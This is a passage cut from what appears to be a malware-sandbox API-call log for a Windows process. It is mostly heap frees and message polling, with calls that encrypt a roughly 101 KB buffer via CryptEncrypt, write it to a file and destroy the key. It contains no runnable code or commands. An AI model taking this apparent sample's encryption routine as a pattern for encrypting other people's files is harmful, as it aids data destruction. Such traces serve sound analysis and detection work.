hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.175] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.175] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.176] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.176] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37f1708 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0211.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0211.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab428, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.180] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x18b56, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x18b58) returned 1 [0211.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.180] CharLowerBuffW (in: lpsz="byte[101208]", cchLength=0xc | out: lpsz="byte[101208]") returned 0xc [0211.180] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.185] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.185] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.187] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37f1708*, pdwDataLen=0x8cef60*=0x18b56, dwBufLen=0x18b58 | out: pbData=0x37f1708*, pdwDataLen=0x8cef60*=0x18b58) returned 1 [0211.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.192] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.193] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.193] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.193] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.193] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.207] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.208] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x18b58, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x18b58, lpOverlapped=0x0) returned 1 [0211.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.211] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.211] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.211] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.211] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.211] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.211] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab080, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.211] CryptDestroyKey (hKey=0x9e2238) returned 1 [0211.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.211] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.211] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.211] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.211] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.211] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.211] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.211] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.212] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.212] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.212] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.212] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.212] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.212] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.212] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.212] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.212] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.212] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.212] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.212] PeekMessageW (in: lpMsg=0x8cf4a8, 